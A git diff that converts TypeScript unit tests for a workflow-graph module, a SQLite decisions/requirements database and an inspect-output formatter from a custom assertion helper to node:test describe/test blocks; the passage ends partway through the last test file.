     assert.equal(next?.id, "b");
   });
 
-  it("skips steps with incomplete deps", () => {
+  it("skips steps with incomplete deps", (t) => {
     const graph = makeGraph([
       makeStep({ id: "a" }),
       makeStep({ id: "b", dependsOn: ["a"] }),
@@ -203,7 +197,7 @@ describe("getNextPendingStep", () => {
     assert.equal(next?.id, "a");
   });
 
-  it("returns null when all steps are complete", () => {
+  it("returns null when all steps are complete", (t) => {
     const graph = makeGraph([
       makeStep({ id: "a", status: "complete" }),
       makeStep({ id: "b", status: "complete" }),
@@ -212,7 +206,7 @@ describe("getNextPendingStep", () => {
     assert.equal(getNextPendingStep(graph), null);
   });
 
-  it("returns null when all pending steps are blocked", () => {
+  it("returns null when all pending steps are blocked", (t) => {
     const graph = makeGraph([
       makeStep({ id: "a", status: "active" }), // not complete
       makeStep({ id: "b", dependsOn: ["a"] }),  // blocked
@@ -221,7 +215,7 @@ describe("getNextPendingStep", () => {
     assert.equal(getNextPendingStep(graph), null);
   });
 
-  it("returns first pending step with no deps when root steps exist", () => {
+  it("returns first pending step with no deps when root steps exist", (t) => {
     const graph = makeGraph([
       makeStep({ id: "a" }),
       makeStep({ id: "b" }),
@@ -231,7 +225,7 @@ describe("getNextPendingStep", () => {
     assert.equal(next?.id, "a");
   });
 
-  it("skips expanded steps", () => {
+  it("skips expanded steps", (t) => {
     const graph = makeGraph([
       makeStep({ id: "a", status: "expanded" }),
       makeStep({ id: "b" }),
@@ -245,7 +239,7 @@ describe("getNextPendingStep", () => {
 // ─── markStepComplete ────────────────────────────────────────────────────
 
 describe("markStepComplete", () => {
-  it("returns new graph with step status 'complete' (original unchanged)", () => {
+  it("returns new graph with step status 'complete' (original unchanged)", (t) => {
     const original = makeGraph([
       makeStep({ id: "a" }),
       makeStep({ id: "b" }),
@@ -264,7 +258,7 @@ describe("markStepComplete", () => {
     assert.equal(updated.steps[1].status, "pending");
   });
 
-  it("sets finishedAt timestamp", () => {
+  it("sets finishedAt timestamp", (t) => {
     const graph = makeGraph([makeStep({ id: "a" })]);
     const updated = markStepComplete(graph, "a");
     assert.ok(updated.steps[0].finishedAt);
@@ -272,7 +266,7 @@ describe("markStepComplete", () => {
     assert.ok(!isNaN(Date.parse(updated.steps[0].finishedAt!)));
   });
 
-  it("throws for unknown step ID", () => {
+  it("throws for unknown step ID", (t) => {
     const graph = makeGraph([makeStep({ id: "a" })]);
     assert.throws(
       () => markStepComplete(graph, "nonexistent"),
@@ -284,7 +278,7 @@ describe("markStepComplete", () => {
     );
   });
 
-  it("preserves metadata in returned graph", () => {
+  it("preserves metadata in returned graph", (t) => {
     const graph = makeGraph([makeStep({ id: "a" })], "my-workflow");
     const updated = markStepComplete(graph, "a");
     assert.equal(updated.metadata.name, "my-workflow");
@@ -295,7 +289,7 @@ describe("markStepComplete", () => {
 // ─── expandIteration ─────────────────────────────────────────────────────
 
 describe("expandIteration", () => {
-  it("creates instance steps with correct IDs (stepId--001, stepId--002)", () => {
+  it("creates instance steps with correct IDs (stepId--001, stepId--002)", (t) => {
     const graph = makeGraph([
       makeStep({ id: "iter-step", title: "Process items" }),
       makeStep({ id: "final", dependsOn: ["iter-step"] }),
@@ -317,7 +311,7 @@ describe("expandIteration", () => {
     assert.equal(expanded.steps[3].id, "iter-step--003");
   });
 
-  it("marks parent step as 'expanded'", () => {
+  it("marks parent step as 'expanded'", (t) => {
     const graph = makeGraph([
       makeStep({ id: "iter", title: "Iterate" }),
     ]);
@@ -326,7 +320,7 @@ describe("expandIteration", () => {
     assert.equal(expanded.steps[0].status, "expanded");
   });
 
-  it("instance steps have correct titles, prompts, parentStepId, and deps", () => {
+  it("instance steps have correct titles, prompts, parentStepId, and deps", (t) => {
     const graph = makeGraph([
       makeStep({ id: "pre", status: "complete" }),
       makeStep({ id: "iter", title: "Process", dependsOn: ["pre"] }),
@@ -352,7 +346,7 @@ describe("expandIteration", () => {
     assert.equal(inst2.parentStepId, "iter");
   });
 
-  it("rewrites downstream deps from parent ID to all instance IDs", () => {
+  it("rewrites downstream deps from parent ID to all instance IDs", (t) => {
     const graph = makeGraph([
       makeStep({ id: "iter", title: "Iterate" }),
       makeStep({ id: "after", dependsOn: ["iter"] }),
@@ -370,7 +364,7 @@ describe("expandIteration", () => {
     assert.deepStrictEqual(afterStep.dependsOn, ["iter--001", "iter--002"]);
   });
 
-  it("preserves steps that don't depend on the parent", () => {
+  it("preserves steps that don't depend on the parent", (t) => {
     const graph = makeGraph([
       makeStep({ id: "unrelated" }),
       makeStep({ id: "iter", title: "Iterate" }),
@@ -382,7 +376,7 @@ describe("expandIteration", () => {
     assert.deepStrictEqual(unrelated.dependsOn, []);
   });
 
-  it("throws for non-pending parent step", () => {
+  it("throws for non-pending parent step", (t) => {
     const graph = makeGraph([
       makeStep({ id: "iter", status: "complete" }),
     ]);
@@ -397,7 +391,7 @@ describe("expandIteration", () => {
     );
   });
 
-  it("throws for unknown step ID", () => {
+  it("throws for unknown step ID", (t) => {
     const graph = makeGraph([makeStep({ id: "a" })]);
     assert.throws(
       () => expandIteration(graph, "nonexistent", ["a"], "{{item}}"),
@@ -409,7 +403,7 @@ describe("expandIteration", () => {
     );
   });
 
-  it("does not mutate the input graph", () => {
+  it("does not mutate the input graph", (t) => {
     const graph = makeGraph([
       makeStep({ id: "iter", title: "Iterate" }),
       makeStep({ id: "after", dependsOn: ["iter"] }),
@@ -430,7 +424,7 @@ describe("expandIteration", () => {
 // ─── initializeGraph ─────────────────────────────────────────────────────
 
 describe("initializeGraph", () => {
-  it("converts a valid 3-step definition to graph with all pending steps", () => {
+  it("converts a valid 3-step definition to graph with all pending steps", (t) => {
     const def: WorkflowDefinition = {
       version: 1,
       name: "test-workflow",
@@ -465,7 +459,7 @@ describe("initializeGraph", () => {
     assert.deepStrictEqual(graph.steps[2].dependsOn, ["s1", "s2"]);
   });
 
-  it("is also exported as graphFromDefinition (backward compat)", () => {
+  it("is also exported as graphFromDefinition (backward compat)", (t) => {
     assert.equal(graphFromDefinition, initializeGraph);
   });
 });
@@ -473,7 +467,7 @@ describe("initializeGraph", () => {
 // ─── Atomic write safety ─────────────────────────────────────────────────
 
 describe("atomic write safety", () => {
-  it("final file exists and .tmp file does not exist after write", () => {
+  it("final file exists and .tmp file does not exist after write", (t) => {
     const dir = makeTmpDir();
     try {
       const graph = makeGraph([makeStep({ id: "s1" })]);
@@ -486,7 +480,7 @@ describe("atomic write safety", () => {
     }
   });
 
-  it("YAML content is valid and parseable", () => {
+  it("YAML content is valid and parseable", (t) => {
     const dir = makeTmpDir();
     try {
       const graph = makeGraph([makeStep({ id: "s1" })]);
@@ -507,7 +501,7 @@ describe("atomic write safety", () => {
 // ─── YAML snake_case / camelCase boundary ────────────────────────────────
 
 describe("YAML snake_case / camelCase boundary", () => {
-  it("writes snake_case to disk and reads back as camelCase", () => {
+  it("writes snake_case to disk and reads back as camelCase", (t) => {
     const dir = makeTmpDir();
     try {
       const graph = makeGraph([
@@ -541,7 +535,7 @@ describe("YAML snake_case / camelCase boundary", () => {
     }
   });
 
-  it("omits optional fields from YAML when undefined", () => {
+  it("omits optional fields from YAML when undefined", (t) => {
     const dir = makeTmpDir();
     try {
       const graph = makeGraph([
@@ -565,7 +559,7 @@ describe("YAML snake_case / camelCase boundary", () => {
 // ─── Edge cases ──────────────────────────────────────────────────────────
 
 describe("edge cases", () => {
-  it("handles empty items array in expandIteration", () => {
+  it("handles empty items array in expandIteration", (t) => {
     const graph = makeGraph([
       makeStep({ id: "iter" }),
     ]);
@@ -576,7 +570,7 @@ describe("edge cases", () => {
     assert.equal(expanded.steps[0].status, "expanded");
   });
 
-  it("handles graph with single step", () => {
+  it("handles graph with single step", (t) => {
     const graph = makeGraph([makeStep({ id: "only" })]);
     const next = getNextPendingStep(graph);
     assert.equal(next?.id, "only");
@@ -585,7 +579,7 @@ describe("edge cases", () => {
     assert.equal(getNextPendingStep(completed), null);
   });
 
-  it("initializeGraph handles steps with empty requires", () => {
+  it("initializeGraph handles steps with empty requires", (t) => {
     const def: WorkflowDefinition = {
       version: 1,
       name: "empty-requires",
diff --git a/src/resources/extensions/gsd/tests/gsd-db.test.ts b/src/resources/extensions/gsd/tests/gsd-db.test.ts
index 15778ade4..5fb66a81b 100644
--- a/src/resources/extensions/gsd/tests/gsd-db.test.ts
+++ b/src/resources/extensions/gsd/tests/gsd-db.test.ts
@@ -1,4 +1,5 @@
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import * as fs from 'node:fs';
 import * as path from 'node:path';
 import * as os from 'node:os';
@@ -18,8 +19,6 @@ import {
   _resetProvider,
 } from '../gsd-db.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
-
 // ═══════════════════════════════════════════════════════════════════════════
 // Helper: create a temp file path for file-backed DB tests
 // ═══════════════════════════════════════════════════════════════════════════
@@ -47,314 +46,306 @@ function cleanup(dbPath: string): void {
 // gsd-db tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== gsd-db: provider detection ===');
-{
-  const provider = getDbProvider();
-  assertTrue(provider !== null, 'provider should be non-null');
-  assertTrue(
-    provider === 'node:sqlite' || provider === 'better-sqlite3',
-    `provider should be a known name, got: ${provider}`,
-  );
-}
-
-console.log('\n=== gsd-db: fresh DB schema init (memory) ===');
-{
-  const ok = openDatabase(':memory:');
-  assertTrue(ok, 'openDatabase should return true');
-  assertTrue(isDbAvailable(), 'isDbAvailable should be true after open');
-
-  // Check schema_version table
-  const adapter = _getAdapter()!;
-  const version = adapter.prepare('SELECT MAX(version) as version FROM schema_version').get();
-  assertEq(version?.['version'], 4, 'schema version should be 4');
-
-  // Check tables exist by querying them
-  const dRows = adapter.prepare('SELECT count(*) as cnt FROM decisions').get();
-  assertEq(dRows?.['cnt'], 0, 'decisions table should exist and be empty');
-
-  const rRows = adapter.prepare('SELECT count(*) as cnt FROM requirements').get();
-  assertEq(rRows?.['cnt'], 0, 'requirements table should exist and be empty');
-
-  closeDatabase();
-  assertTrue(!isDbAvailable(), 'isDbAvailable should be false after close');
-}
-
-console.log('\n=== gsd-db: double-init idempotency ===');
-{
-  const dbPath = tempDbPath();
-  openDatabase(dbPath);
-
-  // Insert a decision so we can verify it survives re-init
-  insertDecision({
-    id: 'D001',
-    when_context: 'test',
-    scope: 'global',
-    decision: 'test decision',
-    choice: 'option A',
-    rationale: 'because',
-    revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: null,
+describe('gsd-db', () => {
+  test('gsd-db: provider detection', () => {
+    const provider = getDbProvider();
+    assert.ok(provider !== null, 'provider should be non-null');
+    assert.ok(
+      provider === 'node:sqlite' || provider === 'better-sqlite3',
+      `provider should be a known name, got: ${provider}`,
+    );
   });
 
-  closeDatabase();
+  test('gsd-db: fresh DB schema init (memory)', () => {
+    const ok = openDatabase(':memory:');
+    assert.ok(ok, 'openDatabase should return true');
+    assert.ok(isDbAvailable(), 'isDbAvailable should be true after open');
 
-  // Re-open same DB — schema init should be idempotent
-  openDatabase(dbPath);
-  const d = getDecisionById('D001');
-  assertTrue(d !== null, 'decision should survive re-init');
-  assertEq(d?.id, 'D001', 'decision ID preserved after re-init');
+    // Check schema_version table
+    const adapter = _getAdapter()!;
+    const version = adapter.prepare('SELECT MAX(version) as version FROM schema_version').get();
+    assert.deepStrictEqual(version?.['version'], 14, 'schema version should be 14');
 
-  // Schema version should still be 1 (not duplicated)
-  const adapter = _getAdapter()!;
-  const versions = adapter.prepare('SELECT count(*) as cnt FROM schema_version').get();
-  assertEq(versions?.['cnt'], 1, 'schema_version should have exactly 1 row after double-init');
+    // Check tables exist by querying them
+    const dRows = adapter.prepare('SELECT count(*) as cnt FROM decisions').get();
+    assert.deepStrictEqual(dRows?.['cnt'], 0, 'decisions table should exist and be empty');
 
-  cleanup(dbPath);
-}
+    const rRows = adapter.prepare('SELECT count(*) as cnt FROM requirements').get();
+    assert.deepStrictEqual(rRows?.['cnt'], 0, 'requirements table should exist and be empty');
 
-console.log('\n=== gsd-db: insert + get decision ===');
-{
-  openDatabase(':memory:');
-  insertDecision({
-    id: 'D042',
-    when_context: 'during sprint 3',
-    scope: 'M001/S02',
-    decision: 'use SQLite for storage',
-    choice: 'node:sqlite',
-    rationale: 'built-in, zero deps',
-    revisable: 'yes, if perf insufficient',
-    made_by: 'agent',
-    superseded_by: null,
+    closeDatabase();
+    assert.ok(!isDbAvailable(), 'isDbAvailable should be false after close');
   });
 
-  const d = getDecisionById('D042');
-  assertTrue(d !== null, 'should find inserted decision');
-  assertEq(d?.id, 'D042', 'decision id');
-  assertEq(d?.scope, 'M001/S02', 'decision scope');
-  assertEq(d?.choice, 'node:sqlite', 'decision choice');
-  assertTrue(typeof d?.seq === 'number' && d.seq > 0, 'seq should be auto-assigned positive number');
-  assertEq(d?.superseded_by, null, 'superseded_by should be null');
+  test('gsd-db: double-init idempotency', () => {
+    const dbPath = tempDbPath();
+    openDatabase(dbPath);
 
-  // Non-existent
-  const missing = getDecisionById('D999');
-  assertEq(missing, null, 'non-existent decision returns null');
-
-  closeDatabase();
-}
-
-console.log('\n=== gsd-db: insert + get requirement ===');
-{
-  openDatabase(':memory:');
-  insertRequirement({
-    id: 'R007',
-    class: 'functional',
-    status: 'active',
-    description: 'System must persist decisions',
-    why: 'decisions inform future agents',
-    source: 'M001-CONTEXT',
-    primary_owner: 'S01',
-    supporting_slices: 'S02, S03',
-    validation: 'insert and query roundtrip',
-    notes: 'high priority',
-    full_content: 'Full text of requirement...',
-    superseded_by: null,
-  });
-
-  const r = getRequirementById('R007');
-  assertTrue(r !== null, 'should find inserted requirement');
-  assertEq(r?.id, 'R007', 'requirement id');
-  assertEq(r?.class, 'functional', 'requirement class');
-  assertEq(r?.status, 'active', 'requirement status');
-  assertEq(r?.primary_owner, 'S01', 'requirement primary_owner');
-  assertEq(r?.superseded_by, null, 'superseded_by should be null');
-
-  // Non-existent
-  const missing = getRequirementById('R999');
-  assertEq(missing, null, 'non-existent requirement returns null');
-
-  closeDatabase();
-}
-
-console.log('\n=== gsd-db: active_decisions view excludes superseded ===');
-{
-  openDatabase(':memory:');
-
-  insertDecision({
-    id: 'D001',
-    when_context: 'early',
-    scope: 'global',
-    decision: 'use JSON files',
-    choice: 'JSON',
-    rationale: 'simple',
-    revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: 'D002',  // superseded!
-  });
-
-  insertDecision({
-    id: 'D002',
-    when_context: 'later',
-    scope: 'global',
-    decision: 'use SQLite',
-    choice: 'SQLite',
-    rationale: 'better querying',
-    revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: null,  // active
-  });
-
-  insertDecision({
-    id: 'D003',
-    when_context: 'same time',
-    scope: 'local',
-    decision: 'use WAL mode',
-    choice: 'WAL',
-    rationale: 'concurrent reads',
-    revisable: 'no',
-    made_by: 'agent',
-    superseded_by: null,  // active
-  });
-
-  const active = getActiveDecisions();
-  assertEq(active.length, 2, 'active_decisions should return 2 (not the superseded one)');
-  const ids = active.map(d => d.id).sort();
-  assertEq(ids, ['D002', 'D003'], 'active decisions should be D002 and D003');
-
-  // Verify D001 is still in the raw table
-  const d1 = getDecisionById('D001');
-  assertTrue(d1 !== null, 'superseded decision still exists in raw table');
-  assertEq(d1?.superseded_by, 'D002', 'superseded_by is set');
-
-  closeDatabase();
-}
-
-console.log('\n=== gsd-db: active_requirements view excludes superseded ===');
-{
-  openDatabase(':memory:');
-
-  insertRequirement({
-    id: 'R001',
-    class: 'functional',
-    status: 'active',
-    description: 'old requirement',
-    why: 'was needed',
-    source: 'M001',
-    primary_owner: 'S01',
-    supporting_slices: '',
-    validation: 'test',
-    notes: '',
-    full_content: '',
-    superseded_by: 'R002',  // superseded!
-  });
-
-  insertRequirement({
-    id: 'R002',
-    class: 'functional',
-    status: 'active',
-    description: 'new requirement',
-    why: 'replaces R001',
-    source: 'M001',
-    primary_owner: 'S01',
-    supporting_slices: '',
-    validation: 'test',
-    notes: '',
-    full_content: '',
-    superseded_by: null,  // active
-  });
-
-  const active = getActiveRequirements();
-  assertEq(active.length, 1, 'active_requirements should return 1');
-  assertEq(active[0]?.id, 'R002', 'only R002 should be active');
-
-  // R001 still in raw table
-  const r1 = getRequirementById('R001');
-  assertTrue(r1 !== null, 'superseded requirement still in raw table');
-
-  closeDatabase();
-}
-
-console.log('\n=== gsd-db: WAL mode on file-backed DB ===');
-{
-  const dbPath = tempDbPath();
-  openDatabase(dbPath);
-
-  const adapter = _getAdapter()!;
-  const mode = adapter.prepare('PRAGMA journal_mode').get();
-  assertEq(mode?.['journal_mode'], 'wal', 'journal_mode should be wal for file-backed DB');
-
-  cleanup(dbPath);
-}
-
-console.log('\n=== gsd-db: transaction rollback on error ===');
-{
-  openDatabase(':memory:');
-
-  // Insert a decision normally
-  insertDecision({
-    id: 'D010',
-    when_context: 'test',
-    scope: 'test',
-    decision: 'test',
-    choice: 'test',
-    rationale: 'test',
-    revisable: 'test',
-    made_by: 'agent',
-    superseded_by: null,
-  });
-
-  // Try a transaction that fails — the insert inside should be rolled back
-  let threw = false;
-  try {
-    transaction(() => {
-      insertDecision({
-        id: 'D011',
-        when_context: 'should be rolled back',
-        scope: 'test',
-        decision: 'test',
-        choice: 'test',
-        rationale: 'test',
-        revisable: 'test',
-        made_by: 'agent',
-        superseded_by: null,
-      });
-      throw new Error('intentional failure');
+    // Insert a decision so we can verify it survives re-init
+    insertDecision({
+      id: 'D001',
+      when_context: 'test',
+      scope: 'global',
+      decision: 'test decision',
+      choice: 'option A',
+      rationale: 'because',
+      revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: null,
     });
-  } catch (err) {
-    if ((err as Error).message === 'intentional failure') {
-      threw = true;
+
+    closeDatabase();
+
+    // Re-open same DB — schema init should be idempotent
+    openDatabase(dbPath);
+    const d = getDecisionById('D001');
+    assert.ok(d !== null, 'decision should survive re-init');
+    assert.deepStrictEqual(d?.id, 'D001', 'decision ID preserved after re-init');
+
+    // Schema version should still be 1 (not duplicated)
+    const adapter = _getAdapter()!;
+    const versions = adapter.prepare('SELECT count(*) as cnt FROM schema_version').get();
+    assert.deepStrictEqual(versions?.['cnt'], 1, 'schema_version should have exactly 1 row after double-init');
+
+    cleanup(dbPath);
+  });
+
+  test('gsd-db: insert + get decision', () => {
+    openDatabase(':memory:');
+    insertDecision({
+      id: 'D042',
+      when_context: 'during sprint 3',
+      scope: 'M001/S02',
+      decision: 'use SQLite for storage',
+      choice: 'node:sqlite',
+      rationale: 'built-in, zero deps',
+      revisable: 'yes, if perf insufficient',
+      made_by: 'agent',
+      superseded_by: null,
+    });
+
+    const d = getDecisionById('D042');
+    assert.ok(d !== null, 'should find inserted decision');
+    assert.deepStrictEqual(d?.id, 'D042', 'decision id');
+    assert.deepStrictEqual(d?.scope, 'M001/S02', 'decision scope');
+    assert.deepStrictEqual(d?.choice, 'node:sqlite', 'decision choice');
+    assert.ok(typeof d?.seq === 'number' && d.seq > 0, 'seq should be auto-assigned positive number');
+    assert.deepStrictEqual(d?.superseded_by, null, 'superseded_by should be null');
+
+    // Non-existent
+    const missing = getDecisionById('D999');
+    assert.deepStrictEqual(missing, null, 'non-existent decision returns null');
+
+    closeDatabase();
+  });
+
+  test('gsd-db: insert + get requirement', () => {
+    openDatabase(':memory:');
+    insertRequirement({
+      id: 'R007',
+      class: 'functional',
+      status: 'active',
+      description: 'System must persist decisions',
+      why: 'decisions inform future agents',
+      source: 'M001-CONTEXT',
+      primary_owner: 'S01',
+      supporting_slices: 'S02, S03',
+      validation: 'insert and query roundtrip',
+      notes: 'high priority',
+      full_content: 'Full text of requirement...',
+      superseded_by: null,
+    });
+
+    const r = getRequirementById('R007');
+    assert.ok(r !== null, 'should find inserted requirement');
+    assert.deepStrictEqual(r?.id, 'R007', 'requirement id');
+    assert.deepStrictEqual(r?.class, 'functional', 'requirement class');
+    assert.deepStrictEqual(r?.status, 'active', 'requirement status');
+    assert.deepStrictEqual(r?.primary_owner, 'S01', 'requirement primary_owner');
+    assert.deepStrictEqual(r?.superseded_by, null, 'superseded_by should be null');
+
+    // Non-existent
+    const missing = getRequirementById('R999');
+    assert.deepStrictEqual(missing, null, 'non-existent requirement returns null');
+
+    closeDatabase();
+  });
+
+  test('gsd-db: active_decisions view excludes superseded', () => {
+    openDatabase(':memory:');
+
+    insertDecision({
+      id: 'D001',
+      when_context: 'early',
+      scope: 'global',
+      decision: 'use JSON files',
+      choice: 'JSON',
+      rationale: 'simple',
+      revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: 'D002',  // superseded!
+    });
+
+    insertDecision({
+      id: 'D002',
+      when_context: 'later',
+      scope: 'global',
+      decision: 'use SQLite',
+      choice: 'SQLite',
+      rationale: 'better querying',
+      revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: null,  // active
+    });
+
+    insertDecision({
+      id: 'D003',
+      when_context: 'same time',
+      scope: 'local',
+      decision: 'use WAL mode',
+      choice: 'WAL',
+      rationale: 'concurrent reads',
+      revisable: 'no',
+      made_by: 'agent',
+      superseded_by: null,  // active
+    });
+
+    const active = getActiveDecisions();
+    assert.deepStrictEqual(active.length, 2, 'active_decisions should return 2 (not the superseded one)');
+    const ids = active.map(d => d.id).sort();
+    assert.deepStrictEqual(ids, ['D002', 'D003'], 'active decisions should be D002 and D003');
+
+    // Verify D001 is still in the raw table
+    const d1 = getDecisionById('D001');
+    assert.ok(d1 !== null, 'superseded decision still exists in raw table');
+    assert.deepStrictEqual(d1?.superseded_by, 'D002', 'superseded_by is set');
+
+    closeDatabase();
+  });
+
+  test('gsd-db: active_requirements view excludes superseded', () => {
+    openDatabase(':memory:');
+
+    insertRequirement({
+      id: 'R001',
+      class: 'functional',
+      status: 'active',
+      description: 'old requirement',
+      why: 'was needed',
+      source: 'M001',
+      primary_owner: 'S01',
+      supporting_slices: '',
+      validation: 'test',
+      notes: '',
+      full_content: '',
+      superseded_by: 'R002',  // superseded!
+    });
+
+    insertRequirement({
+      id: 'R002',
+      class: 'functional',
+      status: 'active',
+      description: 'new requirement',
+      why: 'replaces R001',
+      source: 'M001',
+      primary_owner: 'S01',
+      supporting_slices: '',
+      validation: 'test',
+      notes: '',
+      full_content: '',
+      superseded_by: null,  // active
+    });
+
+    const active = getActiveRequirements();
+    assert.deepStrictEqual(active.length, 1, 'active_requirements should return 1');
+    assert.deepStrictEqual(active[0]?.id, 'R002', 'only R002 should be active');
+
+    // R001 still in raw table
+    const r1 = getRequirementById('R001');
+    assert.ok(r1 !== null, 'superseded requirement still in raw table');
+
+    closeDatabase();
+  });
+
+  test('gsd-db: WAL mode on file-backed DB', () => {
+    const dbPath = tempDbPath();
+    openDatabase(dbPath);
+
+    const adapter = _getAdapter()!;
+    const mode = adapter.prepare('PRAGMA journal_mode').get();
+    assert.deepStrictEqual(mode?.['journal_mode'], 'wal', 'journal_mode should be wal for file-backed DB');
+
+    cleanup(dbPath);
+  });
+
+  test('gsd-db: transaction rollback on error', () => {
+    openDatabase(':memory:');
+
+    // Insert a decision normally
+    insertDecision({
+      id: 'D010',
+      when_context: 'test',
+      scope: 'test',
+      decision: 'test',
+      choice: 'test',
+      rationale: 'test',
+      revisable: 'test',
+      made_by: 'agent',
+      superseded_by: null,
+    });
+
+    // Try a transaction that fails — the insert inside should be rolled back
+    let threw = false;
+    try {
+      transaction(() => {
+        insertDecision({
+          id: 'D011',
+          when_context: 'should be rolled back',
+          scope: 'test',
+          decision: 'test',
+          choice: 'test',
+          rationale: 'test',
+          revisable: 'test',
+          made_by: 'agent',
+          superseded_by: null,
+        });
+        throw new Error('intentional failure');
+      });
+    } catch (err) {
+      if ((err as Error).message === 'intentional failure') {
+        threw = true;
+      }
     }
-  }
 
-  assertTrue(threw, 'transaction should re-throw the error');
-  const d11 = getDecisionById('D011');
-  assertEq(d11, null, 'D011 should be rolled back (not found)');
+    assert.ok(threw, 'transaction should re-throw the error');
+    const d11 = getDecisionById('D011');
+    assert.deepStrictEqual(d11, null, 'D011 should be rolled back (not found)');
 
-  // D010 should still be there
-  const d10 = getDecisionById('D010');
-  assertTrue(d10 !== null, 'D010 should survive the failed transaction');
+    // D010 should still be there
+    const d10 = getDecisionById('D010');
+    assert.ok(d10 !== null, 'D010 should survive the failed transaction');
 
-  closeDatabase();
-}
+    closeDatabase();
+  });
 
-console.log('\n=== gsd-db: query wrappers return null/empty when DB unavailable ===');
-{
-  // Ensure DB is closed
-  closeDatabase();
-  assertTrue(!isDbAvailable(), 'DB should not be available');
+  test('gsd-db: query wrappers return null/empty when DB unavailable', () => {
+    // Ensure DB is closed
+    closeDatabase();
+    assert.ok(!isDbAvailable(), 'DB should not be available');
 
-  const d = getDecisionById('D001');
-  assertEq(d, null, 'getDecisionById returns null when DB closed');
+    const d = getDecisionById('D001');
+    assert.deepStrictEqual(d, null, 'getDecisionById returns null when DB closed');
 
-  const r = getRequirementById('R001');
-  assertEq(r, null, 'getRequirementById returns null when DB closed');
+    const r = getRequirementById('R001');
+    assert.deepStrictEqual(r, null, 'getRequirementById returns null when DB closed');
 
-  const ad = getActiveDecisions();
-  assertEq(ad, [], 'getActiveDecisions returns [] when DB closed');
+    const ad = getActiveDecisions();
+    assert.deepStrictEqual(ad, [], 'getActiveDecisions returns [] when DB closed');
 
-  const ar = getActiveRequirements();
-  assertEq(ar, [], 'getActiveRequirements returns [] when DB closed');
-}
+    const ar = getActiveRequirements();
+    assert.deepStrictEqual(ar, [], 'getActiveRequirements returns [] when DB closed');
+  });
 
-// ─── Final Report ──────────────────────────────────────────────────────────
-report();
+  // ─── Final Report ──────────────────────────────────────────────────────────
+
+});
diff --git a/src/resources/extensions/gsd/tests/gsd-inspect.test.ts b/src/resources/extensions/gsd/tests/gsd-inspect.test.ts
index 947313c09..418a2c432 100644
--- a/src/resources/extensions/gsd/tests/gsd-inspect.test.ts
+++ b/src/resources/extensions/gsd/tests/gsd-inspect.test.ts
@@ -1,125 +1,114 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 // gsd-inspect — Tests for /gsd inspect output formatting
 //
 // Tests the pure formatInspectOutput function with known data.
 
-import { createTestContext } from './test-helpers.ts';
 import { formatInspectOutput, type InspectData } from '../commands-inspect.ts';
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+describe('gsd-inspect', () => {
+  test('full output formatting', () => {
+    const data: InspectData = {
+      schemaVersion: 2,
+      counts: { decisions: 12, requirements: 8, artifacts: 3 },
+      recentDecisions: [
+        { id: "D012", decision: "Use SQLite for persistence", choice: "node:sqlite with fallback" },
+        { id: "D011", decision: "Markdown dual-write", choice: "DB-first then regenerate" },
+      ],
+      recentRequirements: [
+        { id: "R015", status: "active", description: "Commands register via pi.registerCommand" },
+        { id: "R014", status: "active", description: "DB writes use upsert pattern" },
+      ],
+    };
 
-// ── formats output with schema version, counts, and recent entries ──
-console.log("# === gsd-inspect: full output formatting ===");
-{
-  const data: InspectData = {
-    schemaVersion: 2,
-    counts: { decisions: 12, requirements: 8, artifacts: 3 },
-    recentDecisions: [
-      { id: "D012", decision: "Use SQLite for persistence", choice: "node:sqlite with fallback" },
-      { id: "D011", decision: "Markdown dual-write", choice: "DB-first then regenerate" },
-    ],
-    recentRequirements: [
-      { id: "R015", status: "active", description: "Commands register via pi.registerCommand" },
-      { id: "R014", status: "active", description: "DB writes use upsert pattern" },
-    ],
-  };
+    const output = formatInspectOutput(data);
 
-  const output = formatInspectOutput(data);
+    assert.match(output, /=== GSD Database Inspect ===/, "contains header");
+    assert.match(output, /Schema version: 2/, "contains schema version");
+    assert.match(output, /Decisions:\s+12/, "contains decisions count");
+    assert.match(output, /Requirements:\s+8/, "contains requirements count");
+    assert.match(output, /Artifacts:\s+3/, "contains artifacts count");
+    assert.match(output, /Recent decisions:/, "contains recent decisions header");
+    assert.match(output, /D012: Use SQLite for persistence → node:sqlite with fallback/, "contains D012 entry");
+    assert.match(output, /D011: Markdown dual-write → DB-first then regenerate/, "contains D011 entry");
+    assert.match(output, /Recent requirements:/, "contains recent requirements header");
+    assert.match(output, /R015 \[active\]: Commands register via pi\.registerCommand/, "contains R015 entry");
+    assert.match(output, /R014 \[active\]: DB writes use upsert pattern/, "contains R014 entry");
+  });
 
-  assertMatch(output, /=== GSD Database Inspect ===/, "contains header");
-  assertMatch(output, /Schema version: 2/, "contains schema version");
-  assertMatch(output, /Decisions:\s+12/, "contains decisions count");
-  assertMatch(output, /Requirements:\s+8/, "contains requirements count");
-  assertMatch(output, /Artifacts:\s+3/, "contains artifacts count");
-  assertMatch(output, /Recent decisions:/, "contains recent decisions header");
-  assertMatch(output, /D012: Use SQLite for persistence → node:sqlite with fallback/, "contains D012 entry");
-  assertMatch(output, /D011: Markdown dual-write → DB-first then regenerate/, "contains D011 entry");
-  assertMatch(output, /Recent requirements:/, "contains recent requirements header");
-  assertMatch(output, /R015 \[active\]: Commands register via pi\.registerCommand/, "contains R015 entry");
-  assertMatch(output, /R014 \[active\]: DB writes use upsert pattern/, "contains R014 entry");
-}
+  test('empty data', () => {
+    const data: InspectData = {
+      schemaVersion: 1,
+      counts: { decisions: 0, requirements: 0, artifacts: 0 },
+      recentDecisions: [],
+      recentRequirements: [],
+    };
 
-// ── handles zero counts and no recent entries ──
-console.log("# === gsd-inspect: empty data ===");
-{
-  const data: InspectData = {
-    schemaVersion: 1,
-    counts: { decisions: 0, requirements: 0, artifacts: 0 },
-    recentDecisions: [],
-    recentRequirements: [],
-  };
+    const output = formatInspectOutput(data);
 
-  const output = formatInspectOutput(data);
+    assert.match(output, /Schema version: 1/, "contains schema version 1");
+    assert.match(output, /Decisions:\s+0/, "zero decisions");
+    assert.match(output, /Requirements:\s+0/, "zero requirements");
